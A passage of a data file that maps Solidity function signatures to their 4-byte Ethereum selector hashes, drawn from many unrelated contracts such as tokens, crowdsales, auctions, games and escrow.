"0x7acee816", "verify(address,bytes32)": "0x0dd5ee1b", "activate(uint256)": "0xb260c42a", "membershipStatus(address)": "0x56ed8636", "LocalsMembership()": "0x8c5aae96", "isRedemptionPermitted(address,uint256,uint256)": "0xb558f334", "isInvestmentPermitted(address,uint256,uint256)": "0x8250f7e5", "getCroById(uint256)": "0x8ee553cc", "getCrosCounter()": "0xad615f40", "changeCroStatus(address,uint8)": "0x5b48e66a", "submitCro(bytes32,bytes32)": "0xf94a3223", "rejectProposal(uint256)": "0xbc28d878", "acceptProposal(uint256)": "0x60c5cc3a", "getProposalById(uint32)": "0x371a4ea8", "getProposalsCount()": "0x98e527d3", "submitProposal(bytes32,uint32,uint32)": "0x48d51a0d", "Regulator()": "0xd95514a8", "provideData(address,address,uint256,bytes)": "0x9ed58c7a", "requestData(address,address,uint256)": "0x58cda0ab", "customerConsents(address)": "0xa1639c6b", "getConsent(uint256)": "0x7a0e09aa", "requestConsent(address,address,uint256)": "0x61d68b54", "Consents()": "0xcd8fce49", "unset(bytes32)": "0x9141d6f9", "set(bytes32,bytes32)": "0xf71f7a25", "TestContract(string)": "0xe3787c61", "getStage()": "0xfcaa7664", "getNumTickets()": "0x0b5adfff", "getNumUsers()": "0x65f88c0d", "distributePrizes()": "0x7ce52eb6", "randomChoiceFromticketPool()": "0xf7bada53", "generate_random(uint256,string)": "0x7c280f44", "remove(uint256)": "0x4cc82215", "registerTicketsToUser(string,address,uint256)": "0xab90602c", "generateNewTicket(address)": "0xac1424fd", "closeRegistration()": "0x7dc673bc", "RaffleBitcoinBook(string,uint256)": "0xeb7698e2", "attrUUID(address,uint256)": "0xa1103f37", "getInsertPointForNumTokens(int256,address,uint256)": "0xa40a99ac", "getLockedTokens(address)": "0x6b2d95d4", "getLastNode(address)": "0x427fa1d2", "getNumTokens(address,uint256)": "0xd1382092", "getCommitHash(address,uint256)": "0xd901402b", "pollExists(uint256)": "0x88d21ff3", "hasBeenRevealed(address,uint256)": "0x72d8e442", "revealStageActive(uint256)": "0x14367652", "commitStageActive(uint256)": "0x0c4a5153", "pollEnded(uint256)": "0xee684830", "getTotalNumberOfTokensForWinningOption(uint256)": "0x053e71a6", "isPassed(uint256)": "0x49403183", "startPoll(uint256,uint256,uint256)": "0x32ed3d60", "getNumPassingTokens(address,uint256,uint256)": "0xb43bd069", "revealVote(uint256,uint256,uint256)": "0xb11d8bb8", "validPosition(uint256,uint256,address,uint256)": "0x819b0293", "commitVote(uint256,bytes32,uint256,uint256)": "0x6cbf9c5e", "rescueTokens(uint256)": "0x97603560", "withdrawVotingRights(uint256)": "0xe7b1d43c", "requestVotingRights(uint256)": "0xa25236fe", "PLCRVoting(address)": "0x96b86e1d", "setAdministrator(address)": "0xdf8089ef", "Administrable(address)": "0xf5868e49", "getRecTransactions()": "0x78d6fd25", "getSentTransactions()": "0xc62dcd5b", "getRecTransactionData(uint256)": "0xcc2e08ea", "getSentTransactionData(uint256)": "0x083a0436", "disputeTransaction(uint256,uint256)": "0x91c11cae", "refundTransaction(uint256)": "0xd4e678b8", "finalizeTransaction(uint256)": "0x4a57e1c9", "senderWithdrawal(uint256)": "0xe0f50bac", "receiverWithdrawal(uint256)": "0x94602869", "acceptTransaction(uint256)": "0xa9dd6895", "makeTransaction(address,uint256,uint256)": "0x6b6e71b9", "sendMsg()": "0xf41c639e", "example()": "0x54353f2f", "costWei()": "0x44097d70", "sendText(string,string)": "0x30ac3052", "setDelegadoDeEscuela(bytes32,bytes32,uint256,uint256)": "0xdf013fab", "setDelegadoDeEscuelaVerify(bytes32,bytes32,uint256,uint256)": "0x3ccf5c8f", "setDelegadoDeDistrito(bytes32,uint256)": "0x33210356", "setDelegadoDeDistritoVerify(bytes32,uint256)": "0x72664744", "setFiscal(uint256,uint256,uint256,bytes32)": "0xadca32e7", "setFiscalVerify(uint256,uint256,uint256,bytes32)": "0xe61109fd", "getDistritos()": "0x5896f37f", "existsDistrito(uint256)": "0x4dfc7aa1", "createDistrito(uint256,address)": "0x6fd09735", "createDistritoVerify(uint256)": "0x4579c805", "basicFunctionReturn()": "0x199ba9e8", "BlingTokenSale()": "0xd847e48f", "testInitialBalanceUsingNewContract()": "0xfdff6b30", "testHasCinderToken()": "0x732d2da4", "testSaleHasOwnerOnCreation()": "0x3fc8b029", "setPeggleBot(string)": "0x551e4c27", "PeggleCoin()": "0x70243248", "getMsgValueAfter()": "0xa591d4a6", "getMsgValueBefore()": "0xb72916ef", "getMsgGasAfter()": "0x6eced029", "getMsgGasBefore()": "0xefdcb506", "getMsgDataAfter()": "0xbaea0431", "getMsgDataBefore()": "0x11c98718", "updateProduct(bytes32,string,address,uint256,uint8,uint256)": "0x4a54fb0a", "createProduct(bytes32,string,address,uint256,uint8,uint256)": "0xcafbc49d", "pit()": "0xf03c7c6e", "lad(bytes32)": "0xde5f5517", "setPep(address)": "0xd9c27cc6", "pip()": "0xd741e2f9", "setVox(address)": "0xcf48d1a6", "fit()": "0xc8e13bb4", "out()": "0xb2a1449b", "pep()": "0xace237f5", "tax()": "0x99c8d556", "mold(bytes32,uint256)": "0x92b0d721", "sai()": "0x9166cba4", "rum()": "0x8cf0c191", "cage(uint256,uint256)": "0x8ceedb47", "setPip(address)": "0x82bf9a75", "turn(address)": "0x7e74325f", "gem()": "0x7bd2bea7", "gap()": "0x6c32c0a6", "vox()": "0x67550a35", "axe()": "0x509bf2bf", "cupi()": "0x49955431", "flow()": "0x343aad82", "air()": "0x27e7e21e", "rho()": "0x20aba08b", "gov()": "0x12d43a51", "skr()": "0x0f8a771e", "sin()": "0x071bafb5", "getContractETH()": "0x8258cbbd", "getProfitPerShare()": "0x1aebcb89", "takeProjectBonus(address,uint256)": "0x629b9cb1", "getProjectBonus()": "0xb7b5e811", "setIsProjectBonus(bool)": "0x80560a0a", "getIsProjectBonus()": "0x7c71c0eb", "getContractPayout()": "0x1741526f", "setBank(address,uint256)": "0xbc44ea9a", "injectEtherToDividend()": "0xa6741cfd", "injectEtherFromIco()": "0xb67e2064", "CryptoDuelCoin()": "0x99603bfe", "deployRuntimeContract()": "0x90ab7d34", "deployCtorContract()": "0xebe24dfd", "setNum(uint256,int256)": "0x730db1f8", "_createProxy(address,address)": "0x11589260", "createManyProxies(uint256,address,address)": "0x70d383dc", "changeFuckyou()": "0x34d92490", "changeTicketMag(uint256)": "0xf8392303", "changeTurnLast(uint256)": "0x9e8e4add", "calculateTicketPrice()": "0xb07be207", "calculateYourValueEven(uint256)": "0x4f5963fb", "calculateYourValue2(uint256)": "0x77599026", "calculateYourValue1(uint256)": "0x31e396c8", "vote(uint256,address)": "0x02d947ef", "StartNewGame(string,string,string)": "0xf7d518b5", "addBonusToUser(address,uint256,uint256,uint256)": "0x173dc741", "changeBurnPaused(uint256)": "0x0f149d0a", "changeTransfersPaused(uint256)": "0x1d80e62a", "getBonusByAddressAndIndex(address,uint256)": "0xbdd36562", "numBonuses()": "0x20b4577e", "setMyPrice(uint256,uint256)": "0x29ee1580", "mintGem(uint256,string,uint256,bool,uint256)": "0xcd575c32", "buyGem(uint256)": "0x48b49fa7", "buyOre()": "0x02138563", "gemsOfOwner(address)": "0xbc8d7a51", "polishRoughStone(uint256)": "0x319dac48", "extractOre(string)": "0x6fcbb546", "_getCategoryIdx(uint256)": "0x09a97b6f", "_generateRandomHash(string)": "0xd054261e", "_getPolishingPrice(uint256)": "0x11f82a2b", "_getRandomMineralId()": "0x6a56a48b", "sendOre(address,uint256)": "0x9aa93224", "balanceOfOre(address)": "0x4cf8dce7", "MineralBase()": "0x43361a6e", "setOperation(address)": "0xf7f3815c", "setOtherNTech3D(address)": "0x1bf678cf", "setNTToken(address)": "0x9ae5dc91", "changeBurnPausedTime(uint256)": "0x2f6e931f", "changeFrozenTime(uint256)": "0x4e9feee6", "mintFrozen(address,uint256)": "0xbf6edbd9", "VLCCoin()": "0x7cf7e0e2", "_calculateUnlockedTokens(uint256,uint256,uint256,uint256,uint8)": "0x41ff4275", "withdrawContributorsTokens(address,uint256)": "0x7f1a4c1f", "withdrawLiquidityPoolTokens(address,uint256)": "0x763a666a", "withdrawBountyTokens(address,uint256)": "0x3029ba69", "withdrawAdvisorsTokens(address,uint256)": "0x467de087", "BITDINERO()": "0xa5c57b18", "claimToken(address,address,uint256)": "0x125bfb66", "HKHCToken(address,uint256)": "0x9f318ae8", "Patney()": "0x54da80c9", "FomoMasterCoin()": "0x1fcafd8f", "ULChain(address,uint256)": "0xadf684ac", "getRamdon()": "0x8098e45e", "gameResult()": "0x7152f800", "getSelfCount()": "0xb7ca3086", "addPlayer()": "0x27b5db8a", "startNewGame()": "0x482d51e0", "changeConfig(uint32,uint256,uint8)": "0x61dbfc3f", "VoipTken()": "0xc805801c", "initPlayers()": "0x1cadd93e", "initUsers()": "0x2294c48a", "initCommunityAddr(address)": "0xedadeb26", "setPaintingArtist(uint256,string)": "0xd59f4e68", "setPaintingName(uint256,string)": "0xfabb7952", "hasEmptyEditionSlots(uint256)": "0x108a101b", "hasEditionInProgress(uint256)": "0x5f4eab65", "getEditionLimits(uint256)": "0xf79098f4", "setEditionLimits(uint256,uint8,uint8,uint8)": "0x783370b5", "setLastEditionOf(uint256,uint256)": "0x3953f4a1", "getEditionsCount(uint256)": "0x5de81534", "increaseGenerationCount(uint256,uint8)": "0x64d0bbc4", "isValidGeneration(uint8)": "0xf195995c", "canCreateEdition(uint256,uint8)": "0x579599bd", "nextOffsetIndex()": "0x7a9e19de", "getOffsetIndex()": "0xfafb76dd", "getAuctionStartedAt(uint256)": "0x37016a5f", "getTokenIdAtIndex(uint256)": "0xc51450ca", "getTokensOnAuction()": "0x3804ab8d", "getAuctionsCount()": "0xe45c1879", "canBeCanceled(uint256)": "0x0cdc92ea", "getAuctionEnd(uint256)": "0xeda89279", "getAuctionSeller(uint256)": "0xc50c44cf", "removeAuction(uint256)": "0x2dd7030b", "isOnAuction(uint256)": "0x37e246ad", "_isOnAuction(uint256)": "0x07a77473", "initAuction(uint256,uint256,uint256,uint256,uint256,address,bool)": "0xab6680f3", "addReleaseAuction(uint256,uint256,uint256,uint256,uint256)": "0x902a83cd", "addAuction(uint256,uint256,uint256,uint256,address)": "0xc9a6b2a8", "canBeBidden(uint256)": "0xeabc8b8e", "getPaintingOriginal(uint256)": "0xa4245527", "lastEditionOf(uint256)": "0xf50b769e", "getPaintingIdAtIndex(uint256)": "0xa3e7061d", "isReady(uint256)": "0x50df8f71", "getOwnershipTokenCount(address,address)": "0x36262665", "getPaintingArtistId(uint256)": "0xcd0fdc24", "getPaintingSpeed(uint256)": "0x9ed57360", "getPaintingGeneration(uint256)": "0x0af9d89c", "getPaintingOwner(uint256)": "0x0d66343c", "createEditionMeta(uint256)": "0x70d1383d", "isApprovedFor(uint256,address)": "0xb5b12e75", "createPainting(address,uint256,uint256,uint8,uint8,uint256,uint256)": "0x8754b1d1", "getPainting(uint256)": "0x145f8ba2", "setOwnership(uint256,address,address)": "0xb69b5611", "decreaseOwnershipTokenCount(address,address)": "0x6ca13df1", "increaseOwnershipTokenCount(address,address)": "0x5b33233b", "paintingsCount()": "0x197b9454", "contracts(uint256)": "0x474da79a", "setDeveloper(address,address)": "0x4f511102", "developer()": "0xca4b208b", "isAllowed(address,address)": "0xa1654379", "signature()": "0x51ff4847", "counter(uint256)": "0xb1f525c6", "pendingEditionsOf(address)": "0x12610b5b", "createEdition(uint256)": "0x330cbc75", "DPToken(uint256,string,string)": "0x77253984", "YYXToken()": "0xade5a328", "Transfer_of_authority_logic(address)": "0x6e247f29", "BitSTDView(address)": "0xc023a231", "Transfer_of_authority_data(address)": "0xa26f644c", "Transfer_of_authority(address)": "0xb9fb0579", "BitSTDLogic(address)": "0x469aaa98", "setSegmentOwner(string,uint32,uint32,string,string)": "0x64e62afc", "setSegment(string,uint32,uint32,string,string,string,string)": "0x4e25658e", "addPicture(string,uint32,uint32,uint32,uint32,string,string,string)": "0x0c740736", "MytilcoinStorage()": "0xb760744f", "tier_action(uint8,uint256,uint256,uint8,uint256,uint256)": "0x7d0bc9c6", "RxEALSaleContract()": "0xea1c41be", "transferSalesAgentPermissions(address)": "0x4a4ede50", "revokeOwnership(address)": "0x83cfbd7f", "grantOwnership(address)": "0xacfd82f2", "RxEALTokenContract()": "0xa33e8d62", "G5()": "0xb179f4d8", "updateCeiling()": "0xa9aeb059", "HenryMiniToken(uint256,string,uint8,string)": "0x8d0515dc", "NoahCoin()": "0x8ff936ea", "Niobium()": "0x675b09cd", "Cashpayz()": "0xd7578295", "SGACrowdsale()": "0xc79bb895", "SGACoin()": "0x6347bb42", "transferTileFromOwner(uint16[],address)": "0xc0338a0c", "setBvToBpFee(uint256)": "0x531ef079", "createNewUser(bytes32,bytes,bytes32,bytes32,address)": "0xb01800f8", "collectLocalBounty(uint16,uint256)": "0x2ad2ae2e", "getTimeLeftToNextLocalBountyCollect(uint16)": "0xc022ef43", "getLocalBountyBalance(uint16)": "0x4fb0d95e", "transferBlockValueToBattleValue(uint16,uint256)": "0x7746167f", "attackTileForExistingUser(uint16,uint256,bool)": "0xad0a6cc3", "claimPrize(address,uint16)": "0xa00545b2", "removePrize(uint16,address,uint256)": "0xae7fa597", "addPrize(uint16,address,uint256,uint256,uint256)": "0x124c27a9", "collectBounty(address,uint256,uint256)": "0x0f88f1a5", "getTimeLeftToNextCollect(address,uint256)": "0x80a1ba6a", "getBountyBalance()": "0x72067d49", "makeUndestroyable()": "0x96a68b91", "rand(uint32)": "0x317d5d9b", "summonHero(address,uint8,int256)": "0x34b768c7", "payWithDailyFreePoint()": "0x3292cd37", "payWithMileagePoint(uint256)": "0xe3f5009f", "payWithGold(uint256)": "0x03c4d93a", "payWithEth(uint256,address)": "0xe8b49df2", "CryptoSagaCardSwapVer2(address,address,address,address)": "0xb890ed85", "addMileagePoint(address,uint256,int256)": "0x4a4fd24d", "preDGZTokensSold()": "0x1d3639ec", "pickaxe()": "0xfa922e66", "creatorFeePercent()": "0x53613dd3", "backEthRatio()": "0x8ef72d15", "isAutoFowarding()": "0xafa902a0", "collectedSum()": "0xecc73f48", "getJntController()": "0x270f7219", "minimumBid()": "0xd3a86386", "contractICO()": "0x91e05922", "currentBadge()": "0x3ee0c627", "getAccountQuantity()": "0xe8ed1cdd", "getMaxTokenAvaliable()": "0xa65ecbeb", "moreTokenPerEtherForSeedRound()": "0xf729b216", "minFinnRequired()": "0x94bb136f", "epicenter_works_addr()": "0xba3025d4", "destTokensSit()": "0x77a0e875", "addressJenkins()": "0x0bc33b22", "preSaleStartdate()": "0xdebcbdcf", "ADDR_MAYA_MARKETING()": "0x7addc766", "privatesaleEnds()": "0x119739ff", "FIRST_UNLOCK()": "0xbe1b7b4c", "TIME_TO_MAKE_1_SHITCLONE()": "0x4a0b132a", "lastTimeMinQuorumMet()": "0x96d7f3f5", "minterWallet()": "0x8f1a422c", "TOTAL_PARSEC_CREDIT_SUPPLY()": "0x27e584d4", "transferToggleRequester()": "0xa3adb958", "nxcSold()": "0xf20652a1", "HARDCAP()": "0x3bd74880", "COMMUNITY_PLUS_PRIORITY_SALE_CAP_ETH()": "0xdfee6348", "currentGameCost()": "0xc9c85ec6", "teamFundAddress()": "0x7fdb6720", "MIN_INVESTED_ETH()": "0xe5637956", "dutchAuction()": "0x9da0d7d4", "presalePiDiscount()": "0xe88810ff", "getDataAddress()": "0xcddb4e44", "ADMISSION_TIME()": "0x1ca43cef", "claimI()": "0xb7317598", "getClaimStatus()": "0x9b77c21a", "thousandtimes()": "0x9b8abe0b", "ratePerEthPhase2()": "0xae1a5611", "MintProofOfStake()": "0x2dc62c4d", "dex()": "0x692058c2", "poolAddressCapTier2()": "0x999dd03e", "myAddr_test()": "0x1e923f1b", "totalFunctions()": "0xa08e8b36", "gamesPlayed()": "0x6c39b7ee", "genesisBlockCount()": "0xbfe597fe", "FRACTION_ETHER()": "0xe70265a5", "transfers()": "0xab5e28c5", "secondBonusPercent()": "0xd9076129", "totalWeiClaimed()": "0xb30475b6", "myReward()": "0x42849570", "FAPFundDeposit3()": "0x856de136", "bookerAddress()": "0x08cad05c", "contestStartTime()": "0x97ab9e7a", "vernamCrowdsaleToken()": "0xebfb3630", "next_round_players()": "0x0e0e73a8", "FT_TOKEN_SALE_CAP()": "0x0067ba69", "oldTokenSale()": "0x47ac704f", "bigBonusPercent()": "0x3b5dd70b", "totalRoyalty()": "0x5a998a09", "bonusWindow2EndTime()": "0x2c53f31b", "killAndRefund()": "0xe15a307c", "PRE_CROWDSALE_CAP()": "0x20dcce99", "currentElement()": "0xd127bb9d", "round1TokensRemaning()": "0x98512d72", "wct2()": "0x6a16ae40", "defaultCreatedCount()": "0x00d17799", "AD()": "0xd0600560", "dailyGrowth_ppm()": "0x6c4e86af", "walletAddressesSet()": "0x8f50fdd6", "Show_address_for_option_B()": "0xa87607af", "getPlanActiveTime()": "0xe507d6dd", "nTransfers()": "0x3585e500", "ccSupply()": "0x3a672722", "CoinvillaSupply()": "0x703ee574", "accumulated_from()": "0x09fca951", "getCurrentMilestoneProcessed()": "0x71461be9", "lastKickoffDateBuffer()": "0x53bc147e", "allRewPaid()": "0x08a10ffe", "amountAvailableToWithdraw()": "0x338f3039", "amountOfUBOsold()": "0x912eb6d9", "pricePerCoin()": "0xc8b1a635", "maxInterval()": "0xcae774b3", "getSecondPhaseCap()": "0x9ec92d42", "minSet()": "0x2b90557c", "GRForGas()": "0xaa8dd5a1", "issuerName()": "0x2e9868f8", "presaleBonusLock()": "0xdc1d70c3", "_filiate()": "0x87e12235", "pveBattleFee()": "0x9610f0e6", "TOTAL_NUM_TOKENS()": "0xc8e7e5ef", "_batch2_rate()": "0x259b5181", "MIN_HOLDER_TOKENS()": "0xee9b4152", "forceOffsetExtraFeeRate()": "0x79d007f7", "masterContractAddress()": "0x3471728a", "tsc()": "0x45061bf8", "totalLockTokenAllocation()": "0x2984f999", "cofounderB()": "0x51290d06", "maxInvestedLimit()": "0xfabf5ea5", "BoBoToKen()": "0xa26ac680", "burnUnmintedTokens(uint256)": "0xdc885527", "SILALAHI()": "0x9f9938fa", "Blackwood()": "0xf39992e4", "getFrozenTimestamp(address)": "0xe6ad5bc7", "multiFreezeWithTimestamp(address[],uint256[])": "0xd950c432", "freezeWithTimestamp(address,uint256)": "0xd70907b0", "DUKCoin()": "0x6590f0ed", "Mentoscoin()": "0x0832ff59", "Crypbest()": "0x8c69c559", "hasVoted()": "0x64821338", "getWitnessesCount()": "0x1266d5f9", "getWitnesses()": "0x96d195bd", "getHeirs()": "0x4eae51f4", "ownerDied()": "0xdbaad1e5", "MyWill(address,string,string,string,address)": "0x4a37b5f7", "TheDeadShitCoin()": "0x791bbe35", "TheFrozenDeadShitCoin()": "0xdef04570", "getSingleGuessInfo(uint256)": "0x6b3032c6", "innerGuess(uint256,uint256,uint256,address)": "0xea8b03c2", "getWinPercent()": "0x09de4148", "setwinPercent(uint256)": "0x8e979bad", "stopGuess(uint256,bool)": "0x0b35ea61", "modifyGuess(uint256,uint256,uint256)": "0xbf730997", "createGuess(uint256,uint256,uint256,uint256,uint256)": "0x2dc9b8f7", "alexToken()": "0x12005e53", "seventyeight()": "0xe689928e", "findTileByAddress(uint16,uint16,address,address)": "0x850f2e2c", "getTileLocation(uint16,uint16,address,address)": "0xd63900d5", "getHarborLocation(uint16,uint16)": "0xe16f374c", "inRangeToDisembark(uint16,uint16,address)": "0x2aed256e", "shipLocation(uint16,uint16,address)": "0x9f855bd5", "fishLocation(bytes32)": "0xbdab5fb0", "getShip(uint16,uint16,address,address)": "0x1c54fbab", "_doCatchFish(uint16,uint16,bytes32)": "0x23023aa4", "reelIn(uint16,uint16,bytes32,bytes32)": "0x1f9a08ca", "castLine(uint16,uint16,bytes32)": "0x37f4494b", "dropAnchor(uint16,uint16)": "0x8de022b7", "setSail(uint16,uint16,bool)": "0xd7e4e1f7", "disembark(uint16,uint16,uint256)": "0x621c3275", "embark(uint16,uint16,uint256)": "0x5c5dc9a0", "allowSpecies(uint16,uint16,address)": "0xae882cf1", "CAPcoin()": "0x2752808a", "MyTest(uint256,string,uint8,string)": "0xad166aae", "_0xPeriheliaToken()": "0xf8b542c8", "ThaiBahtDigital()": "0x0daf96f9", "B33RToken()": "0x1cd0b87f", "NOKIA()": "0x0cc69b5b", "Sumte()": "0x8918ab1b", "commitTeam(address,uint256,uint256[])": "0x0f1e8c24", "transferPlayerBudget(address)": "0x2de86c5b", "getPlayerTeam(address)": "0xacf67746", "getHighscore()": "0x3c961202", "getPlayerScore(address)": "0xe085c539", "getTeamPrice(uint256[])": "0x2b514749", "payTheWinner()": "0x55fecb0b", "storePrizeMoney()": "0x89676b27", "editScores(uint256[],uint256[])": "0x03e3fa51", "commitScores(uint256[],uint256[])": "0x366e881a", "editStartlist(uint256[],uint256[])": "0x117cae9a", "uploadStartlist(uint256[])": "0xfa9e82cf", "TourPool()": "0x53449d26", "updatePremiumCalculator(address)": "0x1cd73845", "acceptExecutorOwnership()": "0x69d516b3", "transferExecutorOwnership(address)": "0x131b81ad", "claim(bytes32,string)": "0x11e84c71", "addPolicy(bytes32,uint256,uint256,uint256,string)": "0x4cc2b5d0", "BitDAOToken()": "0x21f032d3", "TokenDemo(uint256,address,address,address,address)": "0x13a8a080", "issueOwnerMore(uint256)": "0x43ce179e", "PureAirToken(uint256,string,uint8,string)": "0x85138313", "Test2J()": "0x39ef16f2", "balanceOf(bytes32)": "0x6c7f1542", "BeautyCoinToken()": "0x241d7aea", "VICCOToken()": "0x06c265b6", "MainnetProtocol()": "0xde1565fe", "_updateFundingGoal()": "0x3ea3c2bb", "releaseTokens(address[])": "0x6d9634b7", "changePrivateContribution(uint256)": "0xfd3f2f66", "GStarToken()": "0x2c3af973", "totalBurnedTokens()": "0x555f323a", "preMinedSupply()": "0x99a9ccb2", "totalMinedSupply()": "0xb06c76d0", "DPNPlusToken()": "0x65195bc7", "iCapToken()": "0x23aba14f", "init(address,uint256,uint256,uint256,uint256,uint256,uint256,bool,address,bool)": "0xcfcd8c2d", "getEscrowOrder_seller(uint256)": "0x3220b95a", "executeEscrow(uint256,address)": "0x2f220d7a", "acceptEscrow(uint256)": "0xee28ea62", "createEscrow(address,uint256,address,uint256)": "0x694ebe05", "EscrowManager()": "0x455c7050", "revokeSignature(uint256)": "0x3da1f79a", "signAttribute(uint256,uint256)": "0x63da9cf8", "addAttribute(string,bool,bytes32,string,string)": "0xb181954d", "HBCM()": "0x1d64976b", "addToTransferWhiteList(address,address)": "0xadca8ac6", "CryptoRex()": "0xd7689460", "_checklottery(uint32,uint32)": "0xe02c85a4", "_eachPrize(uint32,uint256,uint8,uint32,uint256)": "0xfcde22fa", "_openPrize(uint32,uint32,uint256,uint256)": "0x927726ea", "ONECToken()": "0x09c62a1b", "HPToken()": "0x483f69c0", "DeWeiSecurityServiceToken()": "0x9816006c", "Typhoon()": "0xb2cb1ebd", "Pharmatron(uint256)": "0x2f899fec", "pokerbox()": "0x39625faf", "LetsGoChain(string,string,uint256,uint256,uint256,uint256,uint256,uint256)": "0xc60ced1b", "sellTokensIcoWithReferal(address)": "0xc4fda23e", "_getWeiValueOfTokens(uint256,bool)": "0x674d4691", "_getTokenAmountForReferral(uint256,bool)": "0x07073756", "_getTokenAmountForBuyer(uint256,bool)": "0xf8910241", "getCurrentBuyerRateInPermilles(bool)": "0xfdc98399", "TokenRate(uint256)": "0xd7f8a053", "getRateModifierInPermilles()": "0x026858ea", "currentModifier()": "0x45f32b02", "Visualrockcoin()": "0x5fad18e4", "handleOffchainWhitelisted(address,bytes)": "0x61b6f889", "DigitalKeyCoin()": "0x113e9d4f", "openCrowdFunding(bool,uint256,uint256)": "0x7c1b814f", "check_status()": "0x5fdcd306", "PexCash()": "0xb81c259e", "getInfo(uint256)": "0x1a3cd59a", "withdrawAllTokensFromBalance()": "0x9cbad951", "giveProjectTokens(address,uint256)": "0x42a19c71", "returnTokensFromHoldProjectAddress(uint256)": "0x19bdfc7f", "PayWinners(uint256,address)": "0x5d113b03", "thirdPlacePot()": "0xf5ab69c8", "secondPlacePot()": "0xa2bc183f", "firstPlacePot()": "0xcd5ba752", "FlCToken()": "0x27b075a7", "LULUCOIN()": "0xece4f10d", "ZZZToken()": "0xb20a459d", "AndreisToken()": "0x52388c1b", "GCOXPACToken(string,string,uint8,uint256)": "0xe34f9dcc", "MedAIChain(uint256,string,uint8,string)": "0x78fddd69", "MATOU()": "0x8a6d2d7b", "QUIOToken()": "0xa23291b6", "ULA(uint256,string,string)": "0xdb5861ed", "raffle()": "0x33c1420a", "AmmbrToken()": "0x050c0fd6", "Trust()": "0x164c9bf0", "TripAlly()": "0x23394e46", "GLORY()": "0x99771006", "SafePromo(string,string)": "0x8cda2a15", "withdrawBidForSketch(uint256)": "0x94a1d75c", "enterBidForSketch(uint256)": "0x8b906ca5", "buySketch(uint256)": "0xf83d14e6", "acceptBidForSketch(uint256,uint256)": "0x648236e3", "offerSketchForSaleToAddress(uint256,uint256,address)": "0xae9dc04c", "offerSketchForSale(uint256,uint256)": "0xd1ea2786", "sketchNoLongerForSale(uint256)": "0xb98e2769", "transferSketch(address,uint256)": "0xd947c8d1", "getSketchesWithAuthor(address)": "0xcfdac910", "getSketchesWithHolder(address)": "0xe2101509", "getSketchesOnOfferWithHolder(address)": "0x8b2ad32e", "getSketchesOnOffer()": "0x5fb1f1d7", "getBidCountForSketchesWithHolder(address)": "0xcf7f12ea", "getSketch(uint256)": "0xda323c94", "setOwnerFlag(uint256,uint8)": "0xd2718fbe", "createSketch(string,string)": "0xfb84da41", "setListingFeeInWei(uint256)": "0x13b6c8a8", "SketchMarket()": "0xcf7efb4c", "BotFarmer()": "0x4ba0dd3c", "RicoToken()": "0x4087908f", "OneledgerToken()": "0x1ae7341f", "EIB()": "0xe87a0a59", "MINC()": "0x71b2354d", "setPreICO(bool)": "0x1adf42fb", "setBonus(bool)": "0xcd8550b8", "_getBonusTokenAmount(uint256,uint256)": "0x54ffe626", "GooCrowdsale(uint256,uint256,uint256,uint256,address)": "0xa1fb03f2", "fromPercentage(uint256,uint256)": "0x14a8ca20", "GooToken(uint256)": "0xec664694", "TGCTokenBase(uint256,string,string,uint8)": "0x44304edf", "IVE()": "0xeb85d999", "HAICrowdsale(uint256,uint256,uint256,address,uint256,uint256)": "0x272a847f", "DemeterCrowdsaleInstance()": "0x697ee181", "DemeterCrowdsale(uint256,uint256,uint256,address,uint256,uint256,uint256,uint256,uint256,uint256)": "0xda481ce0", "PartialOwnershipCrowdsale(uint256)": "0xc52f9fa6", "BonusReferrerCrowdsale(uint256)": "0x2aab22ff", "addToReferrals(address,address)": "0x097b4eea", "ReferedCrowdsale()": "0xbd285ea8", "BonusWhiteListCrowdsale(uint256)": "0xbb3611e7", "validWhiteListedPurchase(address)": "0xc3430bce", "WhiteListCrowdsale(uint256)": "0x7088abf0", "AetherCore()": "0x63301198", "_computeNextPrice()": "0x2d493910", "_createUnitHelper(uint256,address)": "0xf8789e1a", "_computeHeight(uint256,uint256,uint256)": "0x5cc57501", "_createDistrict(uint256,uint256,uint256,uint256)": "0xbaa46bdd", "_createBuilding(uint256,uint256,uint256,uint256,uint256,uint256,address,bool)": "0xd7123dff", "_createUnit(uint256,uint256,uint256,uint256,address)": "0x9d07b653", "buyRemaining(address)": "0x5d52fe64", "buyEarlyWhitelist(address)": "0xbac02609", "getWhitelistUser(address)": "0xb36c14fe", "addWhiteListUser(address,uint256,uint256)": "0xd46a005a", "addWhiteListUsers(address[],uint256[],uint256[])": "0xe848aba2", "buyDmlCoin(address)": "0xc536ed5f", "DmlContribution(address,uint256)": "0x2d87cdd6", "setNewUserBonusCardTradable(bool)": "0x1f03bc1b", "emergencyStopSale()": "0x2863f9f3", "allocatePresaleTokens(address,uint256,uint64,uint64)": "0xb31a4e0d", "priceForStage(uint8)": "0xca4ff630", "stageForBlock(uint256)": "0x374e9aa1", "getPrice(uint256)": "0xe7572230", "isActivated()": "0x4a8c1fb4", "doActivateSale(address)": "0x41f51941", "activateSale()": "0xc721f08d", "setANT(address,address,address)": "0xabded6fd", "AragonTokenSale(uint256,uint256,address,address,uint256,uint256,uint8,bytes32)": "0x690b1897", "hashBytes(bytes)": "0x8f9087f5", "hashString(string)": "0x766954b4", "Hash()": "0xaa6d7de4", "extendUnlockDate(uint256)": "0x674e4e0e", "hasUnlockDatePassed()": "0x774e88dc", "temperatureMax()": "0x4befc326", "temperatureMin()": "0x348b1b7d", "failedTimestampSeconds()": "0xf375bcaa", "reportTemperature(int8[],uint32[])": "0x4c5a82cb", "TemperatureMeasurementB(address,int8,int8)": "0x77c427b7", "BillOfSale()": "0xb5563dcf", "deprecate(address)": "0x0753c30c", "send_to_owner(address,uint256,uint32)": "0x544cdbda", "register(address,uint32)": "0x06444e91", "set_notary(address)": "0x65ea19a8", "createTradeContract(address,uint256,uint256,bool)": "0x17be89f0", "TokenTrader(address,uint256,uint256,bool)": "0x802deb22", "removeOrderFromList(bytes32)": "0xb2b3abb1", "recordFillOrder(bytes32,uint256,uint256)": "0x2ed5ca29", "removeOrder(bytes32)": "0xfde99668", "getWorseOrderId(bytes32)": "0x8925f9e9", "getBetterOrderId(bytes32)": "0x94d26cb5", "getOrderMoneyEscrowed(bytes32)": "0x4a1a342b", "getOrderSharesEscrowed(bytes32)": "0xebead05f", "getOrderCreator(bytes32)": "0xe7d80c70", "getAmount(bytes32)": "0x0e0a0d74", "getOrderType(bytes32)": "0xcf357364", "testInvariantOverflow()": "0x047da93f", "testRemoveGains()": "0x134538f3", "testAddGains()": "0x30411a27", "testRemoveLocked()": "0x21d9d5ba", "testAddLocked()": "0xe0cbf845", "testRemovePending()": "0x22b87601", "testAddPending()": "0xb982e5c1", "afterEach()": 